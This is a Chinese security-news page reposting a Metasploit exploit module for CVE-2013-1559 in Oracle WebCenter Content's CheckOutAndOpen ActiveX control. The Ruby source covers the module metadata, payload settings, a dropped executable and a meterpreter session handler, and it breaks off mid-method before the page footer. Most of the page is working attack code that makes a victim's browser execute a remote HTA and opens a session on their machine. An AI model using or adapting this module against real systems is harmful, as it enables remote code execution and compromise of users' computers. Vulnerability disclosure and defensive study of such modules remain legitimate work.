设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 安全中心 > 最新漏洞 > 正文

Oracle WebCenter CheckOutAndOpen.dll ActiveX远程执行代码

时间:2013-06-03 19:14 来源:未知 作者:www.secye.com 阅读:

这个Metasploit的模块利用在Oracle的WebCenter的内容CheckOutAndOpenControl的ActiveX漏洞。此漏洞存在于openWebdav(),用户控制的输入是用来调用ShellExecuteExW()。这个Metasploit的模块滥用的控制,执行任意的HTA从远程位置。这个Metasploit的模块已成功通过测试的安装的ActiveX CheckOutAndOpenControl的用Oracle WebCenter的内容的11.1.1.6.0。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require \'msf/core\'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      \'Name\'           => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
      \'Description\'    => %q{
          This modules exploits a vulnerability found in the Oracle WebCenter Content
        CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where
        user controlled input is used to call ShellExecuteExW(). This module abuses the
        control to execute an arbitrary HTA from a remote location. This module has been
        tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle
        WebCenter Content 11.1.1.6.0.
      },
      \'License\'        => MSF_LICENSE,
      \'Author\'         =>
        [
          \'rgod <rgod[at]autistici.org>\', # Vulnerability discovery
          \'juan vazquez\' # Metasploit module
        ],
      \'References\'     =>
        [
          [ \'CVE\', \'2013-1559\' ],
          [ \'OSVDB\', \'92386\' ],
          [ \'BID\', \'59122\' ],
          [ \'URL\', \'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html\' ],
          [ \'URL\', \'http://www.zerodayinitiative.com/advisories/ZDI-13-094/\' ]
        ],
      \'Payload\'        =>
        {
          \'Space\'    => 2048,
          \'StackAdjustment\' => -3500
        },
      \'DefaultOptions\'  =>
        {
          \'InitialAutoRunScript\' => \'migrate -f -k\'
        },
      \'Platform\'       => \'win\',
      \'Targets\'        =>
        [
          [ \'Automatic\', {} ]
        ],
      \'Privileged\'     => false,
      \'DisclosureDate\' => "Apr 16 2013",
      \'DefaultTarget\'  => 0))
  end

  def exploit
    @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
    @dropped_files = [
      @var_exename
    ]
    super
  end

  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%